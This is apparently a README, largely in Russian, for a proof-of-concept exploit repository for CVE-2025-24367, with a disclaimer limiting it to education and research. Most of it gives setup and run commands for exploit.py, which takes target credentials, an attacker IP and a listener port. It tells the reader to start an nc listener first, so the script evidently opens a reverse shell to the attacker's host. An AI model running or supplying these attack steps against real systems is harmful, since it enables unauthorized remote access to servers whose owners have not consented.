
Proof of Concept for CVE-2025-24367
Важно — прочтите это сначала:
Этот репозиторий иexploit.pyпредоставлены только для образовательных и исследовательских целей. Не используйте этот код против систем, сетей или сервисов, на которые у вас нет явного письменного разрешения. Несанкционированный доступ к компьютерным системам незаконен и неэтичен. Используя этот код, вы соглашаетесь соблюдать применимые законы и правила вашего учреждения.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Перед запуском скрипта убедитесь, что у вас запущен nc listener. Запускайте скрипт без прокси, если только не отлаживаете:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Последнее напоминание: Этот скрипт и README предназначены только для образовательных целей. Никогда не используйте эти инструменты для незаконного доступа к системам.